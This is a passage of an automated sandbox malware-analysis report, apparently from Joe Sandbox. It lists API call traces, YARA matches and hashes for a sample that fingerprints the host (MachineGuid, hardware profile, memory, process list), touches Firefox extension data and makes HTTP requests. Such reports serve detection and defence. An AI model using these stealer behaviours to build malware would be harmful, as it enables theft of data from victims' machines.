                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CA1C131900619ABCF05EFA1C9958EEB775BF58308F00814AF8056B152EF7CAAD5CBD5
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,0042150A), ref: 00416A2B
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00416A46
                                                                                                                                                                                                                                                                                  • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,00000000,00000000,00000000), ref: 00416A6E
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00416A8F
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000001,?), ref: 00416AA6
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                                • String ID: ERROR
                                                                                                                                                                                                                                                                                • API String ID: 4174444224-2861137601
                                                                                                                                                                                                                                                                                • Opcode ID: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
                                                                                                                                                                                                                                                                                • Instruction ID: 855039ff49ac9ec10de8df2a88766b452ea63e393e544b77beb2aca96e60e2a3
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E418131600219ABCB15EBA2D9529EE7369AF44344F41441EF90267241DF7CBD86CBE9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                • CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CharCloseOpenQueryValue
                                                                                                                                                                                                                                                                                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                • API String ID: 47404925-1211650757
                                                                                                                                                                                                                                                                                • Opcode ID: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                • Instruction ID: 74cc808a3cf8f870bdb796636e5c792b2cd0ecd8dddfbe9d76d68e0a257a884b
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8214521D1C7C296E360CB10CD557FBB7A4ABF6348F11A71EB5CC51072EAB061D48342
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040257A
                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040258E
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 004025AD
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 004025E7
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00000000,string too long,004024F6,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 00402608
                                                                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0040260D
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??2@$??3@Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemcpy
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3928403917-0
                                                                                                                                                                                                                                                                                • Opcode ID: 8153bee1c1f18c4321dbbef74a0984615106f9ad5e3a5235685405019ec4d011
                                                                                                                                                                                                                                                                                • Instruction ID: 52b5ec612f7533a417f76914090347e108d7196820fc58126e476e1f6b56743e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8153bee1c1f18c4321dbbef74a0984615106f9ad5e3a5235685405019ec4d011
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 152107B26006011BCB24AE7D9E9842FB7E9DF953107150B3FF452D77C1E6B9D884829D
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,004185DE), ref: 00401005
                                                                                                                                                                                                                                                                                • VirtualAllocExNuma.KERNEL32 ref: 00401025
                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32 ref: 0040103D
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00401063
                                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 0040107D
                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00401089
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Virtual$AllocProcess$CurrentExitFreeNumamemset
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1822673426-0
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411E60: malloc.MSVCRT ref: 00411E71
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411E60: strncpy.MSVCRT ref: 00411E82
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcat$CurrentProfilelstrcpymallocmemsetstrncpy
                                                                                                                                                                                                                                                                                • String ID: Unknown
                                                                                                                                                                                                                                                                                • API String ID: 277847849-1654365787
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocGlobalMemoryProcessStatusmemsetwsprintf
                                                                                                                                                                                                                                                                                • String ID: %d MB
                                                                                                                                                                                                                                                                                • API String ID: 1522292957-2651807785
                                                                                                                                                                                                                                                                                • Opcode ID: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                • Instruction ID: 3e3ed3bcd73a1407d336ad636cad1e72ca107bb31f9cc5cd81d28413454cfe9f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BEF02B71700200B7D7106715DC46F6F7BAADBC17B1F040119F656A32D0CA746C11C7DA
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1274457161-0
                                                                                                                                                                                                                                                                                • Opcode ID: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                • Instruction ID: 62d16cf430872f387fa1639693609a914c0cef2d6ed42a20a6b15e59f3bc2f55
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9516AA01083C089EB46DF29D4E97477E955B26318F1982D9DC880F2CBC3BAC558C7FA
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 562399079-0
                                                                                                                                                                                                                                                                                • Opcode ID: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                • Instruction ID: ad10719cd445ab04cf283b63720ee16ebf2a6e79acd2848d50ffecdf406f3b24
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 571182743002146FD7106B62AC89FFFBB9DEFC9754F04542EB50A86291DE7C9884C6A6
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                  • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(?,00000000,?,?,?,?,?,00421363,0042150A,?,?,?,?,?,?,?), ref: 0040C5DA
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000010,00000000,?,0040CC78,00000000,?,?), ref: 0040C5F8
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                                • API String ID: 998311485-3310892237
                                                                                                                                                                                                                                                                                • Opcode ID: adf5d0fcb4b42b563d8d2014ece056c47c6b9cd30f37acf02c607b39c5062cd4
                                                                                                                                                                                                                                                                                • Instruction ID: e851882c1721239b6607cf2b57b0a0084f57c32a141c23d73fe3fe214d6676a2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adf5d0fcb4b42b563d8d2014ece056c47c6b9cd30f37acf02c607b39c5062cd4
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14616131A107199BCB14FBB1C9D69EE7368AF08308F40455EB91657142EF7CAEC8CBA5
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00416EC0
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403090: lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403090: StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403090: InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?), ref: 00416F77
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpylstrlen$InternetOpen
                                                                                                                                                                                                                                                                                • String ID: ERROR
                                                                                                                                                                                                                                                                                • API String ID: 3860179324-2861137601
                                                                                                                                                                                                                                                                                • Opcode ID: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                • Instruction ID: 43c13bd387ffc7ea7dd124343602ed7a74854246be98469252eee39eb9cb9d78
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E3159719003099FCF00EFA5C9819EEBBB5BF48314F40445EF916A7251DB38A985CFA8
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CreateObjectSingleSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 309549813-0
                                                                                                                                                                                                                                                                                • Opcode ID: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                • Instruction ID: b65bf78c018c26f30e4a94ab22d84a19a40ae7d672281f86a08f23e214b62c4f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA41B1312143409FD314EF61D895BDEB3E9ABC8304F40481EF48A97291DBBCAD89CB66
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32 ref: 00411BAD
                                                                                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,771A8B60,?,?,004144A8), ref: 00411BC8
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,771A8B60,?), ref: 00411BD6
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                                • Opcode ID: 5fd128bd3f60fd455576c9f3abd4fb244e883b3ced7d24e4adf943e857a9464f
                                                                                                                                                                                                                                                                                • Instruction ID: ca78cda8c920ae7da25bbd8c375dff46666a8013e4c9ac76a8aa62fa3564fd1b
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fd128bd3f60fd455576c9f3abd4fb244e883b3ced7d24e4adf943e857a9464f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B50184729096148BC300EF7CD94559EBBF0BB85725F014729ED94D7260E730AA99CBD3
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
